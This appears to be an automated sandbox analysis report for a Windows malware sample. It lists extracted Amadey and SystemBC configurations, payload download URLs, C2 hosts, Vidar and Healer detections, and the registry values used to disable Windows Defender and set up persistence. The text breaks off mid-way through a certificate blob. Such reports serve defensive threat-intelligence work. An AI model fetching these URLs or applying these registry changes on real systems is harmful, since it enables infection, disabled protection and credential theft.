Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24/02/2025, 13:24
Static task
static1
Behavioral task
behavioral1
Sample
97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
Resource
win10v2004-20250217-en
General
-
Target
97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
-
Size
2.1MB
-
MD5
a3ec4b44e7677c12a76bf51f45480133
-
SHA1
15587b7a0420115e979461490689a79beca64118
-
SHA256
97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
-
SHA512
4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075
-
SSDEEP
49152:SIp7K7IffJNc+2H/ZL0M/mfnejq0aGhdM6rz8J:r9JNz2BLV+neu0aGLH
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
systembc
towerbingobongoboom.com
93.186.202.3
-
dns
5.132.191.104
Signatures
-
Amadey family
-
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral1/memory/2876-274-0x0000000000400000-0x000000000086A000-memory.dmp family_vidar_v7 behavioral1/memory/2876-389-0x0000000000400000-0x000000000086A000-memory.dmp family_vidar_v7 behavioral1/memory/2876-611-0x0000000000400000-0x000000000086A000-memory.dmp family_vidar_v7 behavioral1/memory/2876-723-0x0000000000400000-0x000000000086A000-memory.dmp family_vidar_v7 behavioral1/memory/2876-783-0x0000000000400000-0x000000000086A000-memory.dmp family_vidar_v7 behavioral1/memory/2876-805-0x0000000000400000-0x000000000086A000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1452-296-0x0000000001270000-0x00000000016C2000-memory.dmp healer behavioral1/memory/1452-297-0x0000000001270000-0x00000000016C2000-memory.dmp healer behavioral1/memory/1452-537-0x0000000001270000-0x00000000016C2000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE -
Systembc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ inet.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uxek.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GKjci28.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lFlj2tl.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NthMhDa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6ab70434ce.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GKjci28.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c45c2eaab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ada8778c42.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NthMhDa.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 26 1672 powershell.exe 34 1652 powershell.exe -
pid Process 2128 powershell.exe 2308 powershell.exe 2636 powershell.exe 1672 powershell.exe 1652 powershell.exe -
Downloads MZ/PE file 15 IoCs
flow pid Process 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 5 2680 skotes.exe 22 2680 skotes.exe 77 2444 BitLockerToGo.exe 83 624 BitLockerToGo.exe 26 1672 powershell.exe 34 1652 powershell.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2780 chrome.exe 2556 chrome.exe 2956 chrome.exe 2572 chrome.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion inet.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NthMhDa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6ab70434ce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NthMhDa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c45c2eaab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GKjci28.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uxek.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GKjci28.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lFlj2tl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ada8778c42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c45c2eaab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GKjci28.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lFlj2tl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6ab70434ce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GKjci28.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uxek.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ada8778c42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NthMhDa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NthMhDa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion inet.exe -
Executes dropped EXE 23 IoCs
pid Process 2680 skotes.exe 1472 HsDTj78.exe 1452 KsqTMuf.exe 1748 KsqTMuf.exe 2876 lFlj2tl.exe 1556 f87af9d1cb.exe 1452 TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE 1368 NthMhDa.exe 1228 Gxtuum.exe 3124 483d2fa8a0d53818306efeb32d3.exe 3780 GKjci28.exe 1188 inet.exe 2592 uxek.exe 1644 ada8778c42.exe 3492 6ab70434ce.exe 2908 4c45c2eaab.exe 3508 9390d52627.exe 1592 2d2018b2b5.exe 880 KsqTMuf.exe 3516 KsqTMuf.exe 2428 NthMhDa.exe 2144 HsDTj78.exe 268 GKjci28.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine inet.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine GKjci28.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine NthMhDa.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine uxek.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine ada8778c42.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 4c45c2eaab.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine lFlj2tl.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine GKjci28.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 6ab70434ce.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine NthMhDa.exe -
Loads dropped DLL 45 IoCs
pid Process 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 1452 KsqTMuf.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 2680 skotes.exe 2680 skotes.exe 1672 powershell.exe 1672 powershell.exe 2680 skotes.exe 2680 skotes.exe 1368 NthMhDa.exe 1368 NthMhDa.exe 1652 powershell.exe 1652 powershell.exe 2680 skotes.exe 2680 skotes.exe 1228 Gxtuum.exe 1228 Gxtuum.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2444 BitLockerToGo.exe 624 BitLockerToGo.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 880 KsqTMuf.exe 1740 WerFault.exe 1740 WerFault.exe 1740 WerFault.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe 2680 skotes.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f87af9d1cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\f87af9d1cb.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000019621-161.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 2680 skotes.exe 2876 lFlj2tl.exe 1452 TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE 1368 NthMhDa.exe 1228 Gxtuum.exe 3124 483d2fa8a0d53818306efeb32d3.exe 3780 GKjci28.exe 1188 inet.exe 2592 uxek.exe 1644 ada8778c42.exe 3492 6ab70434ce.exe 2908 4c45c2eaab.exe 2428 NthMhDa.exe 268 GKjci28.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1452 set thread context of 1748 1452 KsqTMuf.exe 36 PID 1644 set thread context of 2444 1644 ada8778c42.exe 90 PID 3492 set thread context of 624 3492 6ab70434ce.exe 94 PID 880 set thread context of 3516 880 KsqTMuf.exe 102 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\Test Task17.job inet.exe File created C:\Windows\Tasks\skotes.job 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe File created C:\Windows\Tasks\Gxtuum.job NthMhDa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2972 1452 WerFault.exe 34 1740 880 WerFault.exe 100 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KsqTMuf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GKjci28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9390d52627.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ada8778c42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6ab70434ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c45c2eaab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KsqTMuf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lFlj2tl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GKjci28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KsqTMuf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f87af9d1cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language inet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KsqTMuf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NthMhDa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d2018b2b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 lFlj2tl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString lFlj2tl.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1516 timeout.exe 2072 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 lFlj2tl.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a lFlj2tl.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a lFlj2tl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 2d2018b2b5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 